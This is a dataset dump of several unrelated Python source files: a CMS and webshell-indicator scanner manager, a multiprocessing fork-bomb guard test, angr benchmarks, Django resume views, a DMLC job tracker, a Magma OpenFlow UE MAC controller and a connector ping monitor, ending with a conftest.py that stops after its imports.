source
stringlengths 3
86
| python
stringlengths 75
1.04M
|
|---|---|
CMS_manager.py
|
#!/usr/bin/python3
from Analizer import Analizer
from IOC import IOC
from threading import Thread, Lock, active_count
import threading
from requests import head
from requests.exceptions import ConnectionError
from re import search
class CMS_manager:
def __init__(self, url_site=None, verbose=False):
# Estructura del diccionario -> {"raiz_cms": [Objeto_Analizer (, url_donde_se_encontro_websh)]}
self.cms_dict = {}
self.current_site = url_site
self.lock = Lock()
self.verbose = verbose
self.ioc = IOC(verbose = verbose)
def set_current_site(self, url_site):
self.lock.acquire()
self.current_site = url_site
print("Sitio actual -> " + self.current_site) if self.verbose else None
self.lock.release()
def is_in_dict(self):
self.lock.acquire()
flag = False
print("Buscando en el diccionario -> " + self.current_site) if self.verbose else None
for root_cms in self.cms_dict.keys():
print("\t" + root_cms) if self.verbose else None
flag = root_cms in self.current_site
if flag:
self.lock.release()
return True
# Si no se ha encontrado un CMS en la URL del sitio dado
self.lock.release()
return False
def analize_thread(self):
temp = Analizer(self.current_site, "/home/proy/Documents/cms.json", verbose=self.verbose)
try:
temp.search_cms()
if temp.cms:
self.lock.acquire()
self.cms_dict[temp.root] = temp
self.lock.release()
except ConnectionError:
pass
finally:
del temp
def analize_it(self):
"""
Metodo que inicia dos hilos para analizar la url recibida por
el crawler en busca de CMS o de indicadores de compromiso (webshell y sw de minado)
"""
if not self.is_in_dict():
Thread(target=self.analize_thread, args=(), daemon=True).start()
Thread(target=self.ioc.new_site, args=(self.current_site,), daemon=True).start()
else:
print(self.current_site + " analized before") if self.verbose else None
def new_url(self, crawl_url):
self.set_current_site(crawl_url)
self.analize_it()
# Funcion para hacer el resto del analisis por cada elemento de cms_dict
def traverse_dict(self):
print("Esperando que todos los hilos concluyan") if self.verbose else None
while(active_count() > 1):
pass
for value in list(self.cms_dict.values()):
Thread(target=value.get_last_info(), args=(), daemon=True).start()
if __name__ == "__main__":
ll = ["http://localhost/drupal", "http://localhost/wordpress", "http://localhost/joomla", "https://www.malware.unam.mx"]
#ll2 = ["http://localhost/drupal", "http://localhost/wordpress", "http://localhost/joomla", "http://localhost/wordpress/index.php/2019/11/04/hello-world/"]
aa = CMS_manager(verbose=True)
for ur in ll:
aa.set_current_site(ur)
aa.analize_it()
aa.traverse_dict()
while(active_count() > 1):
pass
for key in aa.cms_dict.keys():
print("################")
print(aa.cms_dict[key].root)
print(aa.cms_dict[key].cms)
print(aa.cms_dict[key].version)
print(aa.cms_dict[key].installed_plugins)
print(aa.cms_dict[key].installed_themes)
#aa.set_current_site("http://localhost/wordpress/index.php/2019/11/04/hello-world/")
#aa.analize_it()
|
mp_fork_bomb.py
|
import multiprocessing
def foo(conn):
conn.send("123")
# Because "if __name__ == '__main__'" is missing this will not work
# correctly on Windows. However, we should get a RuntimeError rather
# than the Windows equivalent of a fork bomb.
r, w = multiprocessing.Pipe(False)
p = multiprocessing.Process(target=foo, args=(w,))
p.start()
w.close()
print(r.recv())
r.close()
p.join()
|
manual_performance.py
|
#!/usr/bin/env python
import angr
import argparse
import sys
import time
import os
import math
import random
import resource
import multiprocessing
from tabulate import tabulate
from os.path import join, dirname, realpath
from progressbar import ProgressBar, Percentage, Bar
test_location = str(join(dirname(realpath(__file__)), '../../binaries/tests'))
class Timer(object):
def __enter__(self):
self.start = time.time()
return self
def __exit__(self, *args):
self.end = time.time()
self.msecs = (self.end - self.start) * 1000
def mean(r):
return 0. if not r else float(sum(r)) / len(r)
def std(r):
average = mean(r)
return math.sqrt(float(sum(pow(x - average, 2) for x in r)) / len(r))
def print_results(tests):
table_runs = []
table_mems = []
for name, test in tests.items():
runs = test['runs']
table_runs.append([name, str(min(runs)), str(max(runs)), str(mean(runs)), str(std(runs))])
for name, test in tests.items():
mems = test['mems']
table_mems.append([name, str(min(mems)), str(max(mems)), str(mean(mems)), str(std(mems))])
header = ['name', 'min', 'max', 'avg', 'std']
print('Timing (in milliseconds)')
print(tabulate(table_runs, headers=header))
print('Maximum RAM usage (in MB)')
print(tabulate(table_mems, headers=header))
def run_counter(path):
p = angr.Project(path)
sm = p.factory.simgr()
sm.run(n=500)
def run_cfg_analysis(path):
load_options = {}
load_options['auto_load_libs'] = False
p = angr.Project(path,
load_options=load_options,
translation_cache=True
)
p.analyses.CFGAccurate()
def time_one(args, test, queue):
filepath = test['filepath']
func = test['test_func']
random.seed(args.seed)
with Timer() as t:
func(filepath)
queue.put(t.msecs)
queue.put(resource.getrusage(resource.RUSAGE_SELF).ru_maxrss / 1000.0)
parser = argparse.ArgumentParser(description='angr performance tests')
parser.add_argument(
'-n', '--n-runs', default=100, type=int,
help='How many runs to perform for each test (default: 100)')
parser.add_argument(
'-s', '--seed', default=1234, type=int,
help='Seed for random (default: 1234)')
args = parser.parse_args()
tests = {
'fauxware_cfg_i386': {
'filepath': join(test_location, 'i386', 'fauxware'),
'test_func': run_cfg_analysis
}
}
# Add counter tests
arch_counter = [
'i386',
'armel',
'armhf',
'i386',
'mips',
'mipsel',
'ppc',
'ppc64',
'x86_64',
]
for arch in arch_counter:
tests['counter_' + arch] = {
'filepath': join(test_location, arch, 'counter'),
'test_func': run_counter
}
print('Seed: ' + str(args.seed))
print('N runs: ' + str(args.n_runs))
queue = multiprocessing.Queue()
for test in tests:
runs = []
mems = []
widgets = ['',
Percentage(), ' ',
Bar()
]
print(test)
pbar = ProgressBar(maxval=args.n_runs, widgets=widgets).start()
for i in range(0, args.n_runs):
p = multiprocessing.Process(target=time_one, args=(args, tests[test], queue))
p.start()
p.join()
runs.append(queue.get())
mems.append(queue.get())
pbar.update(i + 1)
print('')
tests[test]['runs'] = runs
tests[test]['mems'] = mems
print_results(tests)
|
views.py
|
from django.shortcuts import render
from django.views import generic
from django.http import HttpResponse
from django.views.decorators.csrf import csrf_exempt
import threading
from Resumes.utils import post_resumes_notify_email, post_articel_notify_email
from .models import UserInfo, Skill, Record, Function, Education, Project
class IndexView(generic.ListView):
template_name = 'index.html'
http_method_names = ['get']
model = UserInfo
def get_context_data(self, *, object_list=None, **kwargs):
t = threading.Thread(target=post_resumes_notify_email, name='post_resumes_notify_email', args=(self.request,))
t.start()
kwargs = super(IndexView,self).get_context_data(**kwargs)
user = UserInfo.objects.all()[0]
skills = Skill.objects.filter(user_id=user.id).order_by('id')
record_list = list()
records = Record.objects.filter(user_id=user.id).order_by('-start_time')
for record in records:
record_dict = dict()
functs = Function.objects.filter(record_id=record.id)
record_dict['record'] = record
record_dict['function'] = functs
record_list.append(record_dict)
education_list = Education.objects.filter(user_id=user.id)
project_list = Project.objects.filter(user_id=user.id).order_by('id')
kwargs['user'] = user
kwargs['skills'] = skills
kwargs['record_list'] = record_list
kwargs['education_list'] = education_list
kwargs['project_list'] = project_list
return kwargs
class APIView(generic.ListView):
http_method_names = ['post']
@csrf_exempt # 防止POST请求403错误
def post(self, request, *args, **kwargs):
urlpath = request.POST['urlpath']
title = request.POST['title']
userAgent = request.META.get('HTTP_USER_AGENT', None)
t = threading.Thread(target=post_articel_notify_email, name='post_resumes_notify_email', args=(userAgent, urlpath, title))
t.start()
response = HttpResponse(b'{"code":"1000", "msg":"success", "body":{}}',content_type='application/json')
response["Access-Control-Allow-Origin"] = "*"
response["Access-Control-Allow-Methods"] = "POST, GET, OPTIONS"
response["Access-Control-Max-Age"] = "1000"
response["Access-Control-Allow-Headers"] = "*"
return response
|
tracker.py
|
"""
Tracker script for DMLC
Implements the tracker control protocol
- start dmlc jobs
- start ps scheduler and rabit tracker
- help nodes to establish links with each other
Tianqi Chen
"""
import sys
import os
import socket
import struct
import subprocess
import time
import logging
import random
from threading import Thread
"""
Extension of socket to handle recv and send of special data
"""
class ExSocket:
def __init__(self, sock):
self.sock = sock
def recvall(self, nbytes):
res = []
sock = self.sock
nread = 0
while nread < nbytes:
chunk = self.sock.recv(min(nbytes - nread, 1024))
nread += len(chunk)
res.append(chunk)
return ''.join(res)
def recvint(self):
return struct.unpack('@i', self.recvall(4))[0]
def sendint(self, n):
self.sock.sendall(struct.pack('@i', n))
def sendstr(self, s):
self.sendint(len(s))
self.sock.sendall(s)
def recvstr(self):
slen = self.recvint()
return self.recvall(slen)
# magic number used to verify existence of data
kMagic = 0xff99
class SlaveEntry:
def __init__(self, sock, s_addr):
slave = ExSocket(sock)
self.sock = slave
self.host = socket.gethostbyname(s_addr[0])
magic = slave.recvint()
assert magic == kMagic, 'invalid magic number=%d from %s' % (magic, self.host)
slave.sendint(kMagic)
self.rank = slave.recvint()
self.world_size = slave.recvint()
self.jobid = slave.recvstr()
self.cmd = slave.recvstr()
def decide_rank(self, job_map):
if self.rank >= 0:
return self.rank
if self.jobid != 'NULL' and self.jobid in job_map:
return job_map[self.jobid]
return -1
def assign_rank(self, rank, wait_conn, tree_map, parent_map, ring_map):
self.rank = rank
nnset = set(tree_map[rank])
rprev, rnext = ring_map[rank]
self.sock.sendint(rank)
# send parent rank
self.sock.sendint(parent_map[rank])
# send world size
self.sock.sendint(len(tree_map))
self.sock.sendint(len(nnset))
# send the rprev and next link
for r in nnset:
self.sock.sendint(r)
# send prev link
if rprev != -1 and rprev != rank:
nnset.add(rprev)
self.sock.sendint(rprev)
else:
self.sock.sendint(-1)
# send next link
if rnext != -1 and rnext != rank:
nnset.add(rnext)
self.sock.sendint(rnext)
else:
self.sock.sendint(-1)
while True:
ngood = self.sock.recvint()
goodset = set([])
for i in xrange(ngood):
goodset.add(self.sock.recvint())
assert goodset.issubset(nnset)
badset = nnset - goodset
conset = []
for r in badset:
if r in wait_conn:
conset.append(r)
self.sock.sendint(len(conset))
self.sock.sendint(len(badset) - len(conset))
for r in conset:
self.sock.sendstr(wait_conn[r].host)
self.sock.sendint(wait_conn[r].port)
self.sock.sendint(r)
nerr = self.sock.recvint()
if nerr != 0:
continue
self.port = self.sock.recvint()
rmset = []
# all connection was successuly setup
for r in conset:
wait_conn[r].wait_accept -= 1
if wait_conn[r].wait_accept == 0:
rmset.append(r)
for r in rmset:
wait_conn.pop(r, None)
self.wait_accept = len(badset) - len(conset)
return rmset
class RabitTracker:
"""
tracker for rabit
"""
def __init__(self, hostIP, nslave, port = 9091, port_end = 9999):
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
for port in range(port, port_end):
try:
sock.bind((hostIP, port))
self.port = port
break
except socket.error:
continue
sock.listen(16)
self.sock = sock
self.hostIP = hostIP
logging.info('start listen on %s:%d' % (hostIP, self.port))
def __del__(self):
self.sock.close()
def slave_envs(self):
"""
get enviroment variables for slaves
can be passed in as args or envs
"""
return {'DMLC_TRACKER_URI': self.hostIP,
'DMLC_TRACKER_PORT': self.port}
def get_neighbor(self, rank, nslave):
rank = rank + 1
ret = []
if rank > 1:
ret.append(rank / 2 - 1)
if rank * 2 - 1 < nslave:
ret.append(rank * 2 - 1)
if rank * 2 < nslave:
ret.append(rank * 2)
return ret
def get_tree(self, nslave):
tree_map = {}
parent_map = {}
for r in range(nslave):
tree_map[r] = self.get_neighbor(r, nslave)
parent_map[r] = (r + 1) / 2 - 1
return tree_map, parent_map
def find_share_ring(self, tree_map, parent_map, r):
"""
get a ring structure that tends to share nodes with the tree
return a list starting from r
"""
nset = set(tree_map[r])
cset = nset - set([parent_map[r]])
if len(cset) == 0:
return [r]
rlst = [r]
cnt = 0
for v in cset:
vlst = self.find_share_ring(tree_map, parent_map, v)
cnt += 1
if cnt == len(cset):
vlst.reverse()
rlst += vlst
return rlst
def get_ring(self, tree_map, parent_map):
"""
get a ring connection used to recover local data
"""
assert parent_map[0] == -1
rlst = self.find_share_ring(tree_map, parent_map, 0)
assert len(rlst) == len(tree_map)
ring_map = {}
nslave = len(tree_map)
for r in range(nslave):
rprev = (r + nslave - 1) % nslave
rnext = (r + 1) % nslave
ring_map[rlst[r]] = (rlst[rprev], rlst[rnext])
return ring_map
def get_link_map(self, nslave):
"""
get the link map, this is a bit hacky, call for better algorithm
to place similar nodes together
"""
tree_map, parent_map = self.get_tree(nslave)
ring_map = self.get_ring(tree_map, parent_map)
rmap = {0 : 0}
k = 0
for i in range(nslave - 1):
k = ring_map[k][1]
rmap[k] = i + 1
ring_map_ = {}
tree_map_ = {}
parent_map_ ={}
for k, v in ring_map.items():
ring_map_[rmap[k]] = (rmap[v[0]], rmap[v[1]])
for k, v in tree_map.items():
tree_map_[rmap[k]] = [rmap[x] for x in v]
for k, v in parent_map.items():
if k != 0:
parent_map_[rmap[k]] = rmap[v]
else:
parent_map_[rmap[k]] = -1
return tree_map_, parent_map_, ring_map_
def handle_print(self,slave, msg):
logging.info(msg.strip())
sys.stdout.write(msg)
sys.stdout.flush()
def accept_slaves(self, nslave):
# set of nodes that finishs the job
shutdown = {}
# set of nodes that is waiting for connections
wait_conn = {}
# maps job id to rank
job_map = {}
# list of workers that is pending to be assigned rank
pending = []
# lazy initialize tree_map
tree_map = None
while len(shutdown) != nslave:
fd, s_addr = self.sock.accept()
s = SlaveEntry(fd, s_addr)
if s.cmd == 'print':
msg = s.sock.recvstr()
self.handle_print(s, msg)
continue
if s.cmd == 'shutdown':
assert s.rank >= 0 and s.rank not in shutdown
assert s.rank not in wait_conn
shutdown[s.rank] = s
logging.debug('Recieve %s signal from %d' % (s.cmd, s.rank))
continue
assert s.cmd == 'start' or s.cmd == 'recover'
# lazily initialize the slaves
if tree_map == None:
assert s.cmd == 'start'
if s.world_size > 0:
nslave = s.world_size
tree_map, parent_map, ring_map = self.get_link_map(nslave)
# set of nodes that is pending for getting up
todo_nodes = range(nslave)
else:
assert s.world_size == -1 or s.world_size == nslave
if s.cmd == 'recover':
assert s.rank >= 0
rank = s.decide_rank(job_map)
# batch assignment of ranks
if rank == -1:
assert len(todo_nodes) != 0
pending.append(s)
if len(pending) == len(todo_nodes):
pending.sort(key = lambda x : x.host)
for s in pending:
rank = todo_nodes.pop(0)
if s.jobid != 'NULL':
job_map[s.jobid] = rank
s.assign_rank(rank, wait_conn, tree_map, parent_map, ring_map)
if s.wait_accept > 0:
wait_conn[rank] = s
logging.debug('Recieve %s signal from %s; assign rank %d' % (s.cmd, s.host, s.rank))
if len(todo_nodes) == 0:
logging.info('@tracker All of %d nodes getting started' % nslave)
self.start_time = time.time()
else:
s.assign_rank(rank, wait_conn, tree_map, parent_map, ring_map)
logging.debug('Recieve %s signal from %d' % (s.cmd, s.rank))
if s.wait_accept > 0:
wait_conn[rank] = s
logging.info('@tracker All nodes finishes job')
self.end_time = time.time()
logging.info('@tracker %s secs between node start and job finish' % str(self.end_time - self.start_time))
def start(self, nslave):
def run():
self.accept_slaves(nslave)
self.thread = Thread(target = run, args = ())
self.thread.setDaemon(True)
self.thread.start()
def join(self):
while self.thread.isAlive():
self.thread.join(100)
class PSTracker:
"""Start the schduler node in PS
"""
def __init__(self, hostIP, cmd, port = 9091, port_end = 9999, envs = {}):
"""
Starts the PS scheduler
"""
self.cmd = cmd
if cmd is None:
return
self.hostIP = hostIP
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
max_retry = 100
for i in range(0, max_retry):
if i + 1 == max_retry:
raise Exception('the schduler is faild to bind a port')
port = random.randint(port, port_end)
try:
sock.bind(('', port))
self.port = port
sock.close()
break
except socket.error:
continue
env = os.environ.copy()
env['DMLC_ROLE'] = 'scheduler'
env['DMLC_PS_ROOT_URI'] = str(self.hostIP)
env['DMLC_PS_ROOT_PORT'] = str(self.port)
for k, v in envs.items():
env[k] = str(v)
self.thread = Thread(target = (lambda : subprocess.check_call(self.cmd, env=env, shell=True)), args = ())
self.thread.setDaemon(True)
self.thread.start()
def join(self):
if self.cmd is not None:
while self.thread.isAlive():
self.thread.join(100)
def slave_envs(self):
if self.cmd is None:
return {}
else:
return {'DMLC_PS_ROOT_URI': self.hostIP,
'DMLC_PS_ROOT_PORT': self.port}
def submit(nworker, nserver, fun_submit, hostIP = 'auto', pscmd = None):
"""submit job
Paramaters
----------
nworker : int
number of workers
nserver : int
number of servers, if 0 then submit as rabit a job, otherwise sumbit as
a parmaeter server job
fun_sumbit : func
the function to submit the jobs for servers and workers
hostIP : str, optional
the host ip of the root node
pscmd :
"""
# get the root node ip
if hostIP == 'auto':
hostIP = 'ip'
if hostIP == 'dns':
hostIP = socket.getfqdn()
elif hostIP == 'ip':
from socket import gaierror
try:
hostIP = socket.gethostbyname(socket.getfqdn())
except gaierror:
logging.warn('gethostbyname(socket.getfqdn()) failed... trying on hostname()')
hostIP = socket.gethostbyname(socket.gethostname())
if hostIP.startswith("127."):
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
# doesn't have to be reachable
s.connect(('10.255.255.255', 0))
hostIP = s.getsockname()[0]
envs = {'DMLC_NUM_WORKER' : nworker,
'DMLC_NUM_SERVER' : nserver}
# start the root
if nserver == 0:
rabit = RabitTracker(hostIP = hostIP, nslave = nworker)
envs.update(rabit.slave_envs())
rabit.start(nworker)
else:
pserver = PSTracker(hostIP = hostIP, cmd=pscmd, envs = envs)
envs.update(pserver.slave_envs())
# start the workers and servers
fun_submit(nworker, nserver, envs)
# wait the root finished
if nserver == 0:
rabit.join()
else:
pserver.join()
def config_logger(args):
FORMAT = '%(asctime)s %(levelname)s %(message)s'
level = args.log_level if 'log_level' in args else 'DEBUG'
level = eval('logging.' + level)
if 'log_file' not in args or args.log_file is None:
logging.basicConfig(format=FORMAT, level = level)
else:
logging.basicConfig(format=FORMAT, level = level, filename = args.log_file)
console = logging.StreamHandler()
console.setFormatter(logging.Formatter(FORMAT))
console.setLevel(level)
logging.getLogger('').addHandler(console)
|
ue_mac.py
|
"""
Copyright (c) Facebook, Inc. and its affiliates.
All rights reserved.
This source code is licensed under the BSD-style license found in the
LICENSE file in the root directory of this source tree.
"""
import threading
from typing import List
from ryu.controller import ofp_event
from ryu.controller.handler import MAIN_DISPATCHER, set_ev_cls
from ryu.lib.packet import packet
from ryu.lib.packet import ether_types, dhcp
from ryu.ofproto.inet import IPPROTO_TCP, IPPROTO_UDP
from lte.protos.pipelined_pb2 import FlowResponse, SetupFlowsResult, \
UEMacFlowRequest
from magma.pipelined.app.base import MagmaController, ControllerType
from magma.pipelined.app.inout import INGRESS
from magma.pipelined.directoryd_client import update_record
from magma.pipelined.imsi import encode_imsi, decode_imsi
from magma.pipelined.openflow import flows
from magma.pipelined.app.ipfix import IPFIXController
from magma.pipelined.bridge_util import BridgeTools
from magma.pipelined.openflow.exceptions import MagmaOFError
from magma.pipelined.openflow.magma_match import MagmaMatch
from magma.pipelined.openflow.registers import IMSI_REG, load_passthrough
class UEMacAddressController(MagmaController):
"""
UE MAC Address Controller
This controller controls table 0 which is the first table every packet
touches. It matches on UE MAC address and sets IMSI metadata
"""
APP_NAME = "ue_mac"
APP_TYPE = ControllerType.SPECIAL
def __init__(self, *args, **kwargs):
super(UEMacAddressController, self).__init__(*args, **kwargs)
self.tbl_num = self._service_manager.get_table_num(self.APP_NAME)
self.next_table = \
self._service_manager.get_table_num(INGRESS)
self.arpd_controller_fut = kwargs['app_futures']['arpd']
self.arp_contoller = None
self._datapath = None
tbls = self._service_manager.allocate_scratch_tables(self.APP_NAME, 2)
self._passthrough_set_tbl = tbls[0]
self._dhcp_learn_scratch = tbls[1]
self._li_port = None
self._imsi_set_tbl_num = \
self._service_manager.INTERNAL_IMSI_SET_TABLE_NUM
self._ipfix_sample_tbl_num = \
self._service_manager.INTERNAL_IPFIX_SAMPLE_TABLE_NUM
self._app_set_tbl_num = self._service_manager.INTERNAL_APP_SET_TABLE_NUM
if 'li_local_iface' in kwargs['config']:
self._li_port = \
BridgeTools.get_ofport(kwargs['config']['li_local_iface'])
self._dpi_port = \
BridgeTools.get_ofport(kwargs['config']['dpi']['mon_port'])
def initialize_on_connect(self, datapath):
self.delete_all_flows(datapath)
self._datapath = datapath
self._install_default_flows()
def cleanup_on_disconnect(self, datapath):
self.delete_all_flows(datapath)
def handle_restart(self, ue_requests: List[UEMacFlowRequest]
) -> SetupFlowsResult:
"""
Setup current check quota flows.
"""
# TODO Potentially we can run a diff logic but I don't think there is
# benefit(we don't need stats here)
self.delete_all_flows(self._datapath)
self._install_default_flows()
for ue_req in ue_requests:
self.add_ue_mac_flow(ue_req.sid.id, ue_req.mac_addr)
if self.arp_contoller or self.arpd_controller_fut.done():
if not self.arp_contoller:
self.arp_contoller = self.arpd_controller_fut.result()
self.arp_contoller.handle_restart(ue_requests)
self.init_finished = True
return SetupFlowsResult(result=SetupFlowsResult.SUCCESS)
def delete_all_flows(self, datapath):
flows.delete_all_flows_from_table(datapath, self.tbl_num)
flows.delete_all_flows_from_table(datapath, self._passthrough_set_tbl)
flows.delete_all_flows_from_table(datapath, self._dhcp_learn_scratch)
flows.delete_all_flows_from_table(datapath, self._imsi_set_tbl_num)
def add_ue_mac_flow(self, sid, mac_addr):
# TODO report add flow result back to sessiond
if self._datapath is None:
return FlowResponse(result=FlowResponse.FAILURE)
uplink_match = MagmaMatch(eth_src=mac_addr)
self._add_resubmit_flow(sid, uplink_match,
priority=flows.UE_FLOW_PRIORITY,
next_table=self._passthrough_set_tbl)
downlink_match = MagmaMatch(eth_dst=mac_addr)
self._add_resubmit_flow(sid, downlink_match,
priority=flows.UE_FLOW_PRIORITY,
next_table=self._passthrough_set_tbl)
# For handling internal ipfix pkt sampling
if self._service_manager.is_app_enabled(IPFIXController.APP_NAME):
self._add_resubmit_flow(sid, uplink_match,
priority=flows.UE_FLOW_PRIORITY,
tbl_num=self._imsi_set_tbl_num,
next_table=self._ipfix_sample_tbl_num)
self._add_resubmit_flow(sid, downlink_match,
priority=flows.UE_FLOW_PRIORITY,
tbl_num=self._imsi_set_tbl_num,
next_table=self._ipfix_sample_tbl_num)
return FlowResponse(result=FlowResponse.SUCCESS)
def delete_ue_mac_flow(self, sid, mac_addr):
# TODO report add flow result back to sessiond
if self._datapath is None:
return
uplink_match = MagmaMatch(eth_src=mac_addr)
self._delete_resubmit_flow(sid, uplink_match)
downlink_match = MagmaMatch(eth_dst=mac_addr)
self._delete_resubmit_flow(sid, downlink_match)
if self._service_manager.is_app_enabled(IPFIXController.APP_NAME):
self._delete_resubmit_flow(sid, uplink_match,
tbl_num=self._imsi_set_tbl_num)
self._delete_resubmit_flow(sid, downlink_match,
tbl_num=self._imsi_set_tbl_num)
def add_arp_response_flow(self, imsi, yiaddr, chaddr):
if self.arp_contoller or self.arpd_controller_fut.done():
if not self.arp_contoller:
self.arp_contoller = self.arpd_controller_fut.result()
self.arp_contoller.add_ue_arp_flows(self._datapath,
yiaddr, chaddr)
self.logger.debug("From DHCP learn: IMSI %s, has ip %s and mac %s",
imsi, yiaddr, chaddr)
# Associate IMSI to IPv4 addr in directory service
threading.Thread(target=update_record, args=(str(imsi),
yiaddr)).start()
else:
self.logger.error("ARPD controller not ready, ARP learn FAILED")
def _add_resubmit_flow(self, sid, match, action=None,
priority=flows.DEFAULT_PRIORITY,
next_table=None, tbl_num=None):
parser = self._datapath.ofproto_parser
if action is None:
actions = []
else:
actions = [action]
if next_table is None:
next_table = self.next_table
if tbl_num is None:
tbl_num = self.tbl_num
# Add IMSI metadata
if sid:
actions.append(parser.NXActionRegLoad2(dst=IMSI_REG,
value=encode_imsi(sid)))
flows.add_resubmit_next_service_flow(self._datapath, tbl_num,
match, actions=actions,
priority=priority,
resubmit_table=next_table)
def _delete_resubmit_flow(self, sid, match, action=None, tbl_num=None):
parser = self._datapath.ofproto_parser
if action is None:
actions = []
else:
actions = [action]
if tbl_num is None:
tbl_num = self.tbl_num
# Add IMSI metadata
actions.append(
parser.NXActionRegLoad2(dst=IMSI_REG, value=encode_imsi(sid)))
flows.delete_flow(self._datapath, tbl_num, match, actions=actions)
def _add_dns_passthrough_flows(self):
parser = self._datapath.ofproto_parser
# Set so packet skips enforcement and send to egress
action = load_passthrough(parser)
# Install UDP flows for DNS
ulink_match_udp = MagmaMatch(eth_type=ether_types.ETH_TYPE_IP,
ip_proto=IPPROTO_UDP,
udp_dst=53)
self._add_resubmit_flow(None, ulink_match_udp, action,
flows.PASSTHROUGH_PRIORITY,
tbl_num=self._passthrough_set_tbl)
dlink_match_udp = MagmaMatch(eth_type=ether_types.ETH_TYPE_IP,
ip_proto=IPPROTO_UDP,
udp_src=53)
self._add_resubmit_flow(None, dlink_match_udp, action,
flows.PASSTHROUGH_PRIORITY,
tbl_num=self._passthrough_set_tbl)
# Install TCP flows for DNS
ulink_match_tcp = MagmaMatch(eth_type=ether_types.ETH_TYPE_IP,
ip_proto=IPPROTO_TCP,
tcp_dst=53)
self._add_resubmit_flow(None, ulink_match_tcp, action,
flows.PASSTHROUGH_PRIORITY,
tbl_num=self._passthrough_set_tbl)
dlink_match_tcp = MagmaMatch(eth_type=ether_types.ETH_TYPE_IP,
ip_proto=IPPROTO_TCP,
tcp_src=53)
self._add_resubmit_flow(None, dlink_match_tcp, action,
flows.PASSTHROUGH_PRIORITY,
tbl_num=self._passthrough_set_tbl)
# Install TCP flows for DNS over tls
ulink_match_tcp = MagmaMatch(eth_type=ether_types.ETH_TYPE_IP,
ip_proto=IPPROTO_TCP,
tcp_dst=853)
self._add_resubmit_flow(None, ulink_match_tcp, action,
flows.PASSTHROUGH_PRIORITY,
tbl_num=self._passthrough_set_tbl)
dlink_match_tcp = MagmaMatch(eth_type=ether_types.ETH_TYPE_IP,
ip_proto=IPPROTO_TCP,
tcp_src=853)
self._add_resubmit_flow(None, dlink_match_tcp, action,
flows.PASSTHROUGH_PRIORITY,
tbl_num=self._passthrough_set_tbl)
def _add_dhcp_passthrough_flows(self):
ofproto, parser = self._datapath.ofproto, self._datapath.ofproto_parser
# Set so packet skips enforcement controller
action = load_passthrough(parser)
uplink_match = MagmaMatch(eth_type=ether_types.ETH_TYPE_IP,
ip_proto=IPPROTO_UDP,
udp_src=68,
udp_dst=67)
self._add_resubmit_flow(None, uplink_match, action,
flows.PASSTHROUGH_PRIORITY,
tbl_num=self._passthrough_set_tbl)
downlink_match = MagmaMatch(eth_type=ether_types.ETH_TYPE_IP,
ip_proto=IPPROTO_UDP,
udp_src=67,
udp_dst=68)
# Set so triggers packetin and we can learn the ip to do arp response
self._add_resubmit_flow(None, downlink_match, action,
flows.PASSTHROUGH_PRIORITY, next_table=self._dhcp_learn_scratch,
tbl_num=self._passthrough_set_tbl)
# Install default flow for dhcp learn scratch
flows.add_output_flow(self._datapath, self._dhcp_learn_scratch,
match=MagmaMatch(), actions=[],
priority=flows.PASSTHROUGH_PRIORITY,
output_port=ofproto.OFPP_CONTROLLER,
copy_table=self.next_table,
max_len=ofproto.OFPCML_NO_BUFFER)
def _add_uplink_arp_allow_flow(self):
arp_match = MagmaMatch(eth_type=ether_types.ETH_TYPE_ARP)
flows.add_resubmit_next_service_flow(self._datapath, self.tbl_num,
arp_match, actions=[],
priority=flows.DEFAULT_PRIORITY,
resubmit_table=self.next_table)
@set_ev_cls(ofp_event.EventOFPPacketIn, MAIN_DISPATCHER)
def _learn_arp_entry(self, ev):
"""
Learn action to process PacketIn DHCP packets, dhcp ack packets will
be used to learn the ARP entry for the UE to install rules in the arp
table. The DHCP packets will then be sent thorugh the pipeline.
"""
msg = ev.msg
if self._dhcp_learn_scratch != msg.table_id:
# Intended for other application
return
try:
encoded_imsi = _get_encoded_imsi_from_packetin(msg)
# Decode the imsi to properly save in directoryd
imsi = decode_imsi(encoded_imsi)
except MagmaOFError as e:
# No packet direction, but intended for this table
self.logger.error("Error obtaining IMSI from pkt-in: %s", e)
return
pkt = packet.Packet(msg.data)
dhcp_header = pkt.get_protocols(dhcp.dhcp)[0]
# DHCP yiaddr is the client(UE) ip addr
# chaddr is the client mac address
self.add_arp_response_flow(imsi, dhcp_header.yiaddr, dhcp_header.chaddr)
def _install_default_flows(self):
"""
Install default flows
"""
# Allows arp packets from uplink(no eth dst set) to go to the arp table
self._add_uplink_arp_allow_flow()
self._add_dhcp_passthrough_flows()
self._add_dns_passthrough_flows()
self._add_resubmit_flow(None, MagmaMatch(),
priority=flows.MINIMUM_PRIORITY,
tbl_num=self._passthrough_set_tbl)
if self._service_manager.is_app_enabled(IPFIXController.APP_NAME):
self._add_resubmit_flow(None, MagmaMatch(in_port=self._dpi_port),
priority=flows.PASSTHROUGH_PRIORITY,
next_table=self._app_set_tbl_num)
if self._li_port:
match = MagmaMatch(in_port=self._li_port)
flows.add_resubmit_next_service_flow(self._datapath, self.tbl_num,
match, actions=[], priority=flows.DEFAULT_PRIORITY,
resubmit_table=self.next_table)
# TODO We might want a default drop all rule with min priority, but
# adding it breakes all unit tests for this controller(needs work)
def _get_encoded_imsi_from_packetin(msg):
"""
Retrieve encoded imsi from the Packet-In message, or raise an exception if
it doesn't exist.
"""
imsi = msg.match.get(IMSI_REG)
if imsi is None:
raise MagmaOFError('IMSI not found in OFPMatch')
return imsi
|
monitorConnectors.py
|
"""
Created on Feb 11 10:32 2020
@author: nishit
"""
import threading
import time
from IO.monitorPub import MonitorPub
from utils_intern.messageLogger import MessageLogger
logger = MessageLogger.get_logger_parent(parent="connector")
class MonitorConnectors:
def __init__(self, config):
self.status = {}
self.ping_frequency = config.getint("IO", "ping.frequency")
self.monitor = MonitorPub(config, id="connector")
self.check_ping_thread = threading.Thread(target=self.check_pings)
self.check_ping_thread.start()
logger.info("initialized monitor connector")
def ping(self, name):
self.status[name] = int(time.time())
logger.info("ping by "+str(name))
def check_pings(self):
while True:
logger.debug("ping status : "+str(self.status))
current_time = int(time.time())
ping_delayed = False
for name, last in self.status.items():
if current_time - last > self.ping_frequency:
ping_delayed = True
break
if not ping_delayed:
self.monitor.send_monitor_ping(self.ping_frequency)
logger.info("monitor ping sent")
else:
logger.info("monitor ping not sent")
sleep_time = self.ping_frequency - (time.time() - current_time)
if sleep_time > 0:
time.sleep(sleep_time)
|
conftest.py
|
import pytest
import time
